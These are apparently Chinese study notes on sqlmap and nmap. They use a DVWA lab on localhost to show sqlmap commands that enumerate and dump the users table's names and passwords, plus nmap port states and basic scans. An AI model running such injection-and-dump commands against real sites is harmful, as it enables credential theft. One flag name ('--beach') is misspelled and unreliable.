Nmap、Sqlmap等工具使用

Sqlmap

-u 指定注入点url
-r 指定request？
--dbs 暴库
--tables 列出表
--columns 列出字段
--dump 下载数据
--beach 程序自动输入询问语句的[Y/N]
--current-db web当前使用的数据库
--start 指定开始行
--stop 指定结束行
--cookie 添加cookie
-D -T -C 指定数据库、表、字段

以dvwa中sql注入为例(url='http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#')
1.sqlmap -u 'url' --dbs
2.sqlmap -u 'url' -D dvwa --tables
3.sqlmap -u 'url' -D dvwa -T users --columns
4.sqlmap -u 'url' -D dvwa -T users -C "first_name,password" --dump

还可以利用抓包工具将request请求保存为txt文档，然后通过-r参数传递(request.txt为抓包保存的txt文件)
1.sqlmap -r request.txt --dbs
2.sqlmap -r request.txt -D dvwa --tables
3.sqlmap -r request.txt -D dvwa -T users --columns
4.sqlmap -r request.txt -D dvwa -T users -C 'first_name,password' --dump

Nmap

状态描述：
open:应用程序在该端口接收 TCP 连接或者 UDP 报文。
closed:关闭的端口对于nmap也是可访问的， 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。
filtered:由于包过滤阻止探测报文到达端口，nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由规则 或者主机上的软件防火墙。
unfiltered:未被过滤状态意味着端口可访问，但是nmap无法确定它是开放还是关闭。 只有用于映射防火墙规则集的 ACK 扫描才会把端口分类到这个状态。
open|filtered:无法确定端口是开放还是被过滤， 开放的端口不响应就是一个例子。没有响应也可能意味着报文过滤器丢弃了探测报文或者它引发的任何反应。UDP，IP协议,FIN, Null 等扫描会引起。
closed|filtered:（关闭或者被过滤的）：无法确定端口是关闭的还是被过滤的

nmap 127.0.0.1
nmap 127.0.0.1 -p 1-65535
使用-p参数指定端口范围。如果不加-p指定端口范围，会扫描一些默认的、著名的、已知协议的端口，会漏掉未知服务端口